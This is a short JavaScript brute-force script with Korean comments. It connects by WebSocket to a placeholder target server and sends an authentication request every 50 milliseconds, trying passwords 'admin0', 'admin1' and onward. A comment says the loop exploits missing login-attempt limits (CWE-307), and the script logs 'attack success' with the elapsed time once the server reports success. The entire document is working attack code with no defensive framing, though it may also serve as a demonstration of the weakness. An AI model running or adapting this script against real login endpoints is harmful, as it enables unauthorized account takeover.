// 무차별 대입 스크립트 (function bruteForceAttack() { const socket = new WebSocket('ws://target-server-url'); let attackTimer = null let startTime = null; socket.onopen = () => { let current = 0; // 50ms 간격으로 멈추지 않고 인증 패킷 전송 (CWE-307 취약점 이용) startTime = Date.now() attackTimer = setInterval(() => { socket.send(JSON.stringify({ type: 'AUTH_REQ', pass: "admin" + current })); current++; }, 50); }; socket.onmessage = (e) => { const res = JSON.parse(e.data); if (res.success === true) { endTime = Date.now() console.log("공격 성공! 소요 시간: ", (endTime - startTime)); clearInterval(attackTimer); } }; })();